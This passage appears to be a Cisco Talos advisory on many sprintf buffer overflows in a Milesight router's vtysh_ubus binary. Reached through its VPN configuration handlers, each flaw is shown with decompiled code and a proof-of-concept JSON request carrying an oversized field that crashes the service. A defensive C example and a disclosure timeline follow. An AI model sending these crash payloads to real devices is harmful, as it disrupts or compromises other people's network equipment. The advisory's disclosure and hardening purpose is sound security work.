is_equal = strcmp(table_key,"remote_ip");
if (is_equal == 0) {
vtysh_command_argument = (char *)blobmsg_get_string(table_value);
vtysh_command_format = "tunnel destination %s";
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"remote_ip": "A"*0x300,
}
}
]
}
The vpn_gre_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_gre function.
In the set_gre function, the local_ip JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"local_ip");
if (is_equal == 0) {
vtysh_command_argument = (char *)blobmsg_get_string(table_value);
vtysh_command_format = "tunnel source %s";
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"local_ip": "A"*0x300,
}
}
]
}
The vpn_gre_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_gre function.
In the set_gre function, the remote_virtual_ip JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"remote_virtual_ip");
if (is_equal == 0) {
    vtysh_command_argument = (char *)blobmsg_get_string(table_value);
    vtysh_command_format = "ip address peer %s";
    [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"remote_virtual_ip": "A"*0x300,
}
}
]
}
The vpn_gre_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_gre function.
In the set_gre function, the key JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"key");
if (is_equal == 0) {
    vtysh_command_argument = (char *)blobmsg_get_string(table_value);
    if (*vtysh_command_argument != '\0') {
        vtysh_command_format = "tunnel key %s";
        [...]
    }
    [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"key": "A"*0x300,
}
}
]
}
The vpn_l2tp_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_l2tp function.
In the set_l2tp function, the remote_subnet and remote_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
    [...]
    if (table_value != (char *)0x0) {
        remote_subnet = (char *)blobmsg_data(table_value);
    }
}
[...]
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
    [...]
    if (table_value != (char *)0x0) {
        remote_mask = (char *)blobmsg_data(table_value);
    }
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_l2tp",
"function": "set",
"values": [
{
"base": "yruo_vpn_l2tp",
"index": 1,
"value": {
"remote_subnet": "A"*0x300,
"remote_mask": "A",
}
}
]
}
The vpn_l2tp_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_l2tp function.
In the set_l2tp function, the key JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"key");
[...]
if ((is_equal == 0) && ([...], table_value != (char *)0x0)) {
    key = (char *)blobmsg_data(table_value);
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"secret %s",key);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_l2tp",
"function": "set",
"values": [
{
"base": "yruo_vpn_l2tp",
"index": 1,
"value": {
"key": "A"*0x300,
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the expert_options JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"expert_options");
if (is_equal != 0) {
    [...]
}
expert_options = blobmsg_get_string(table_value);
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"options %s",expert_options);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"expert_options": "A"*0x600,
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the remote_ip and port JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"remote_ip");
if (is_equal == 0) {
    remote_ip = blobmsg_get_string(table_value);
    [...]
}
[...]
is_equal = strcmp(table_key,"port");
if (is_equal == 0) {
    port = blobmsg_get_u32(table_value);
    [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip remote server %s port %d",remote_ip,port);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_ip": "A"*0x600,
"port": 1,
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the local_virtual_ip and remote_virtual_ip JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal == 0) {
    local_virtual_ip = (char *)blobmsg_get_string(table_value);
    is_equal = strcmp(table_key,"remote_virtual_ip");
    if (is_equal == 0) {
        remote_virtual_ip = (char *)blobmsg_get_string(table_value);
        [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address static local %s peer %s",local_virtual_ip,remote_virtual_ip);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"local_virtual_ip": "A"*0x600,
"remote_virtual_ip": "POC",
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the local_virtual_ip and local_virtual_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal != 0) {
    [...]
}
local_virtual_ip = (char *)blobmsg_get_string(table_value);
[...]
is_equal = strcmp(table_key,"local_virtual_mask");
if (is_equal == 0) {
    local_virtual_mask = (char *)blobmsg_get_string(table_value);
    [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address static local %s mask %s",local_virtual_ip,local_virtual_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"local_virtual_mask": "A"*0x600,
"local_virtual_ip": "POC",
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the username and password JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"username");
if (is_equal == 0) {
    username = (char *)blobmsg_get_string(table_value);
    [...]
}
[...]
is_equal = strcmp(table_key,"password");
if (is_equal == 0) {
    password = (char *)blobmsg_get_string(table_value);
    [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"username %s password %s",username,password);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"username": "A"*0x600,
"password": "POC",
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the remote_subnet and remote_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
    [...]
    if (table_value != (char *)0x0) {
        remote_subnet = (char *)blobmsg_data(table_value);
    }
}
else {
    is_equal = strcmp(table_key,"remote_mask");
    [...]
    if ((is_equal == 0) && ([...], table_value != (char *)0x0)) {
        remote_mask = (char *)blobmsg_data(table_value);
    }
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_pptp",
"function": "set",
"values": [
{
"base": "yruo_vpn_pptp",
"index": 1,
"value": {
"remote_subnet": "A"*0x600,
"remote_mask": "POC",
}
}
]
}
The vpn_dmvpn_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_dmvpn function.
In the set_dmvpn function, the cisco_secret JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"cisco_secret");
if (is_equal == 0) {
    cisco_secret = (char *)blobmsg_get_string(table_value);
    if (*cisco_secret != '\0') {
        command_format_string = "ip nhrp authentication %s";
        [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,cisco_secret);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"cisco_secret": "A"*0x600,
}
}
]
}
The vpn_dmvpn_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_ike_profile function.
In the set_ike_profile function, the secrets_local JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"secrets_local");
if (is_equal == 0) {
    if(version == 1){
        command_argument = blobmsg_get_string(table_value);
        command_format_string = "pre-shared-key %s";
    }
    else{
        if(version == 2){
            command_argument = blobmsg_get_string(table_value);
            command_format_string = "pre-shared-key local %s";
        }
    }
    [...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 7,
"execute": 1,
"core": "yruo_vpn_ipsec_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_ipsec_client",
"index": 1,
"value": {
"secrets_local": "A"*0x300,
"version": 1,
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the old_remote_subnet and old_remote_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
    action = blobmsg_get_u32(table_value);
}
else {
    is_equal = strcmp(table_key,"remote_subnet");
    if (is_equal == 0) {
        remote_subnet = blobmsg_get_string(table_value);
    }
    else {
        is_equal = strcmp(table_key,"remote_mask");
        if (is_equal == 0) {
            remote_mask = blobmsg_get_string(table_value);
        }
        else {
            is_equal = strcmp(table_key,"old_remote_subnet");
            if (is_equal == 0) {
                old_remote_subnet = blobmsg_get_string(table_value);
            }
            else {
                is_equal = strcmp(table_key,"old_remote_mask");
                if (is_equal == 0) {
                    old_remote_mask = blobmsg_get_string(table_value);
                }
            }
        }
    }
Eventually the following portion of code is reached:
if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
    if (action == 2) {
        if (old_remote_mask == 0 || old_remote_subnet == 0) goto OTHER_BRANCH;
        sprintf(vtysh_command_buffer,"no remote subnet %s mask %s",old_remote_subnet,old_remote_mask);
        [...]
    }
    [...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_subnet":[{
"remote_mask":"",
"remote_subnet":"",
"old_remote_subnet": "A"*0x600,
"old_remote_mask": "POC",
"action":2,
}]
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the remote_subnet and remote_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
    action = blobmsg_get_u32(table_value);
}
else {
    is_equal = strcmp(table_key,"remote_subnet");
    if (is_equal == 0) {
        remote_subnet = blobmsg_get_string(table_value);
    }
    else {
        is_equal = strcmp(table_key,"remote_mask");
        if (is_equal == 0) {
            remote_mask = blobmsg_get_string(table_value);
        }
        else {
            is_equal = strcmp(table_key,"old_remote_subnet");
            if (is_equal == 0) {
                old_remote_subnet = blobmsg_get_string(table_value);
            }
            else {
                is_equal = strcmp(table_key,"old_remote_mask");
                if (is_equal == 0) {
                    old_remote_mask = blobmsg_get_string(table_value);
                }
            }
        }
    }
Eventually the following portion of code is reached:
if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
    if (action == 2) {
        if (old_remote_mask == 0 || old_remote_subnet == 0) goto OTHER_BRANCH;
        [...]
        sprintf(vtysh_command_buffer,"remote subnet %s mask %s",remote_subnet,remote_mask);
    }
    [...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_subnet":[{
"remote_mask":"A"*0x600,
"remote_subnet":"",
"old_remote_subnet": "",
"old_remote_mask": "",
"action":2,
}]
}
}
]
}
The vpn_openvpn_client_handler_set function is the entry point for one of the functionalities. This function will eventually call the set_openvpn_client function.
In the set_openvpn_client function, the remote_subnet and remote_mask JSON keys are used to fetch their respective values:
is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
    action = blobmsg_get_u32(table_value);
}
else {
    is_equal = strcmp(table_key,"remote_subnet");
    if (is_equal == 0) {
        remote_subnet = blobmsg_get_string(table_value);
    }
    else {
        is_equal = strcmp(table_key,"remote_mask");
        if (is_equal == 0) {
            remote_mask = blobmsg_get_string(table_value);
        }
        [...]
}
Eventually the following portion of code is reached:
if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
    if (action == 2) {
        [...]
    }
    else {
        if (action == 3) {
            command_format_string = "no remote subnet %s mask %s";
        }
        else {
            if (action == 1){
                command_format_string = "remote subnet %s mask %s";
            }
            else{
                [...]
            }
        }
        sprintf(vtysh_command_buff,command_format_string,remote_subnet,remote_mask);
    }
    [...]
}
The format string used depends on the value of the `action` variable.
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_openvpn_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_openvpn_client",
"index": 1,
"value": {
"remote_subnet":[{
"remote_mask":"A"*0x600,
"remote_subnet":"",
"action":3,
}]
}
}
]
}
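Every call site listed above follows the same pattern: a string value taken from the request with blobmsg_get_string or blobmsg_data is passed straight to sprintf, which writes into the fixed-size vtysh_command_buffer with no length check. The C program below is an added example written for this advisory; it is not code from the advisory, from Talos, or from the Milesight firmware. It assumes a hypothetical 256-byte command buffer (the advisory does not state the real size) and constructs its own sample input mirroring the "A"*0x300 payloads. It shows three defensive pieces: a way to measure whether the original unbounded sprintf would have overflowed (using vsnprintf with a NULL target, so nothing is written), a bounded replacement that refuses to emit a truncated command, and a field-level length and character check for the address-style values (remote_ip, local_ip, masks) that makes the command length bounded by construction.

```c
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of vtysh_command_buffer (hypothetical; the advisory does not
 * state the real one). The PoCs send 0x300 and 0x600 byte values, which is
 * far beyond anything a legitimate IP address, mask or key needs. */
#define VTYSH_CMD_BUF_SIZE 256

/* Constructed sample input mirroring the advisory's "A"*0x300 payload. */
const char *sample_long_value(void) {
    static char s[0x300 + 1];
    memset(s, 'A', 0x300);
    s[0x300] = '\0';
    return s;
}

/* Number of bytes the original unbounded sprintf() would emit (NUL excluded),
 * measured with vsnprintf(NULL, 0, ...) so nothing is actually written. */
static int formatted_len(const char *fmt, va_list ap) {
    va_list copy;
    va_copy(copy, ap);
    int n = vsnprintf(NULL, 0, fmt, copy);
    va_end(copy);
    return n;
}

/* True if sprintf(buf, fmt, ...) into a buffer of `bufsize` bytes would
 * overflow. Lets a reviewer reason about the vulnerable call sites without
 * reproducing the crash. */
bool would_overflow(size_t bufsize, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int n = formatted_len(fmt, ap);
    va_end(ap);
    return n < 0 || (size_t)n >= bufsize;
}

/* Hardened replacement for the sprintf() pattern: bounded write plus an
 * explicit truncation check. Returns 0 on success, -1 when the command does
 * not fit, in which case buf is cleared so a truncated command is never run. */
int build_vtysh_command(char *buf, size_t bufsize, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, bufsize, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= bufsize) {
        if (bufsize > 0) buf[0] = '\0';
        return -1;
    }
    return 0;
}

/* Field-level validation for the address-like JSON values the handlers
 * format (remote_ip, local_ip, masks, ...): a dotted IPv4 literal is at most
 * 15 bytes and contains only digits and dots. Rejecting anything else before
 * formatting bounds the command length by construction. */
bool is_plausible_ipv4_field(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 15) return false;
    for (size_t i = 0; i < len; i++) {
        if (!((s[i] >= '0' && s[i] <= '9') || s[i] == '.')) return false;
    }
    return true;
}

static char g_demo_buf[VTYSH_CMD_BUF_SIZE];

/* Worked run over a constructed set_gre-style remote_ip value: returns 1 when
 * the oversized value is rejected at both layers and the well-formed one is
 * accepted and formatted into g_demo_buf. */
int demo_gre_remote_ip(void) {
    const char *bad = sample_long_value();
    const char *good = "192.0.2.10";                 /* constructed value */
    if (is_plausible_ipv4_field(bad)) return 0;       /* must be rejected */
    if (!is_plausible_ipv4_field(good)) return 0;
    if (build_vtysh_command(g_demo_buf, sizeof g_demo_buf,
                            "tunnel destination %s", bad) != -1) return 0;
    if (build_vtysh_command(g_demo_buf, sizeof g_demo_buf,
                            "tunnel destination %s", good) != 0) return 0;
    return 1;
}

const char *demo_last_command(void) { return g_demo_buf; }

int main(void) {
    printf("oversized remote_ip would overflow sprintf: %s\n",
           would_overflow(VTYSH_CMD_BUF_SIZE, "tunnel destination %s",
                          sample_long_value()) ? "yes" : "no");
    printf("demo result: %d, command: \"%s\"\n",
           demo_gre_remote_ip(), demo_last_command());
    return 0;
}
```

The two-argument format strings in the advisory ("remote subnet %s %s", "username %s password %s") need no special handling here: would_overflow and build_vtysh_command are variadic, so the same check covers a call with one oversized field and one short one, which is exactly the shape of the l2tp and OpenVPN PoCs. The validation helper only covers dotted IPv4 fields; values such as key, password and expert_options still need a caller-defined maximum length, and the truncation check in build_vtysh_command is the backstop when that is missing.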
Since the maintainer of this software did not release a patch during the 90-day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html
2023-02-14 - Initial Vendor Contact
2023-02-21 - Vendor Disclosure
2023-07-06 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.